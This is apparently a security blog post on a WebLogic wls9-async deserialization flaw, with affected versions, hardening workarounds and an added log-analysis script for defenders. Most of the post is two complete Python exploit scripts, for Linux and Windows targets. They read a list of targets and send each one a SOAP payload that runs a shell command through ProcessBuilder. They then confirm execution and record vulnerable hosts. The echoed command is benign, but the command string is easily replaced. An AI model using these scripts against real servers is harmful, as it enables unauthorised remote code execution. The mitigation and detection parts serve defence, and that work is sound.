This post was last updated on 29 April 2019; suggestions and questions are welcome in the discussion section at the bottom.

This WebLogic vulnerability allows system commands to be executed directly on the server.

Affected versions

WebLogic 10.X
WebLogic 12.1.3

Risk level

Vulnerability detection


Exploitation

The scripts are as follows.

Linux:

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Use: python3 weblogic_wls9_async_linux.py file_name
# file: one target per line, in the form http://x.x.x.x:7001 or https://x.x.x.x:7001

import sys

import requests
import urllib3

# The requests below use verify=False; silence the InsecureRequestWarning that would otherwise be printed for every target.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(sys.argv) != 2:
    print('Use: python3 weblogic_wls9_async_linux.py file_name')
    sys.exit(1)

print('\n')
print('正在验证中,请稍后...')
print('\n')

path = '/_async/AsyncResponseService'
# SOAP message whose WorkContext header is deserialized by the async component;
# the embedded ProcessBuilder writes test.txt into the component's web root.
payload = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/test.txt</string>
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3/2ig01a/war/test.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''

# The request headers are the same for every target, so build them once.
# Content-Length is computed by requests from the body, so the hard-coded value is not needed.
header = {
    'Accept-Encoding': 'gzip, deflate',
    'SOAPAction': '',
    'Accept': '*/*',
    'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
    'Connection': 'keep-alive',
    'content-type': 'text/xml',
}

# Open the target file, take one URL per line, and send the request to each
with open(sys.argv[1], 'r') as f, open('result.txt', 'w') as result:
    for ff in f:
        target = ff.strip()
        if not target:
            continue
        try:
            r = requests.post(target + path, headers=header, data=payload, timeout=10, verify=False)
            # The written file is served from the war's document root, so a 200 here confirms the command ran
            check = requests.get(target + '/_async/test.txt', timeout=10, verify=False)
            if r.status_code == 202:
                if check.status_code == 200:
                    print('[+] ' + target + ' 存在wls9-async组件反序列化漏洞')
                else:
                    print('[+] ' + target + ' 可能存在漏洞')
                result.write(target + '\n')
            else:
                print('[-] ' + target + ' 不存在漏洞')
        except requests.exceptions.RequestException:
            print('[-] ' + target + ' 连接超时')
            continue
print('\n请查看目录下的:result.txt')

Windows:

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Use: python3 weblogic_wls9_async_win.py file_name
# file: one target per line, in the form http://x.x.x.x:7001 or https://x.x.x.x:7001

import sys

import requests
import urllib3

# The requests below use verify=False; silence the InsecureRequestWarning that would otherwise be printed for every target.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(sys.argv) != 2:
    print('Use: python3 weblogic_wls9_async_win.py file_name')
    sys.exit(1)

print('\n')
print('正在验证中,请稍后...')
print('\n')

path = '/_async/AsyncResponseService'
# Same SOAP message as the Linux variant, with cmd.exe /c in place of /bin/bash -c.
payload = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/test.txt</string>
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3/2ig01a/war/test.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''

# The request headers are the same for every target, so build them once.
# Content-Length is computed by requests from the body, so the hard-coded value is not needed.
header = {
    'Accept-Encoding': 'gzip, deflate',
    'SOAPAction': '',
    'Accept': '*/*',
    'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
    'Connection': 'keep-alive',
    'content-type': 'text/xml',
}

# Open the target file, take one URL per line, and send the request to each
with open(sys.argv[1], 'r') as f, open('result.txt', 'w') as result:
    for ff in f:
        target = ff.strip()
        if not target:
            continue
        try:
            r = requests.post(target + path, headers=header, data=payload, timeout=10, verify=False)
            # The written file is served from the war's document root, so a 200 here confirms the command ran
            check = requests.get(target + '/_async/test.txt', timeout=10, verify=False)
            if r.status_code == 202:
                if check.status_code == 200:
                    print('[+] ' + target + ' 存在wls9-async组件反序列化漏洞')
                else:
                    print('[+] ' + target + ' 可能存在漏洞')
                result.write(target + '\n')
            else:
                print('[-] ' + target + ' 不存在漏洞')
        except requests.exceptions.RequestException:
            print('[-] ' + target + ' 连接超时')
            continue
print('\n请查看目录下的:result.txt')

Hardening

Oracle has not yet released an official patch; the temporary workarounds are:
1. Delete the bea_wls9_async_response.war package or the com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war package together with the related directories, then restart the WebLogic service.
2. Block URL access to the /_async/* path through access policy controls.
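Added example (not part of the original post): a defender-side script that looks for this activity in WebLogic's access.log and checks that the hardening took effect. It parses access log lines in the common log format, lists every request under /_async/ (there should be none once the war is removed or the path is denied), correlates the two-request sequence the scripts above produce (a POST to the service answered 202, then a GET of a file under /_async/ answered 200) per client IP, and interprets the status of a POST probe sent after hardening. The log lines are constructed, and the assumption that a denied path answers 403 and a removed war answers 404 is the usual behaviour, not something the post states.

```python
#!/usr/bin/env python3
# Added example, not from the original post: defender-side checks for the
# wls9-async component described above. All sample log lines are constructed.
import re
from collections import defaultdict

SERVICE_PATH = '/_async/AsyncResponseService'
ASYNC_PREFIX = '/_async/'

# Constructed sample access.log content in the common log format WebLogic writes by default.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [26/Apr/2019:19:07:48 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 202 0
10.0.0.5 - - [26/Apr/2019:19:07:49 +0800] "GET /_async/test.txt HTTP/1.1" 200 14
10.0.0.9 - - [26/Apr/2019:19:10:02 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4523
10.0.0.7 - - [26/Apr/2019:19:12:11 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 403 1164
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+$'
)


def parse_access_line(line):
    """Return a dict for one common-log-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    # Drop any query string so path comparisons only see the resource path.
    rec['path'] = rec['path'].split('?', 1)[0]
    return rec


def find_async_requests(log_text):
    """Every request under /_async/; after the workarounds above none should reach the server."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if rec and rec['path'].startswith(ASYNC_PREFIX):
            # 'service' is the deserializing endpoint itself; 'file' is anything else served from the war
            rec['kind'] = 'service' if rec['path'] == SERVICE_PATH else 'file'
            hits.append(rec)
    return hits


def correlate_poc_pattern(log_text):
    """Client IPs that POSTed to the service (202) and also fetched a file under /_async/ (200).

    This is the exact request pair the scripts above send, so a match means the
    endpoint was reachable and a verification file was read back from it.
    """
    by_ip = defaultdict(lambda: {'service_202': False, 'file_200': False})
    for rec in find_async_requests(log_text):
        if rec['kind'] == 'service' and rec['method'] == 'POST' and rec['status'] == 202:
            by_ip[rec['ip']]['service_202'] = True
        elif rec['kind'] == 'file' and rec['method'] == 'GET' and rec['status'] == 200:
            by_ip[rec['ip']]['file_200'] = True
    return sorted(ip for ip, flags in by_ip.items() if flags['service_202'] and flags['file_200'])


def mitigation_state(status_code):
    """Interpret the status of a POST probe to /_async/AsyncResponseService after hardening.

    202 means the service accepted the message, so the war is still deployed and the
    path is not blocked. 403 (path denied) and 404 (war removed) are the expected
    results of the two workarounds; anything else needs a closer look.
    """
    if status_code == 202:
        return 'reachable'
    if status_code in (403, 404):
        return 'blocked'
    return 'inconclusive'


if __name__ == '__main__':
    for rec in find_async_requests(SAMPLE_ACCESS_LOG):
        print(f"{rec['ip']} {rec['method']} {rec['path']} -> {rec['status']} ({rec['kind']})")
    print('PoC request pair seen from:', correlate_poc_pattern(SAMPLE_ACCESS_LOG))
```

Run it against a real access.log by reading the file into `find_async_requests` and `correlate_poc_pattern`; any request under /_async/ that still appears after the war was removed or the path denied means the workaround is not in place on that server.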
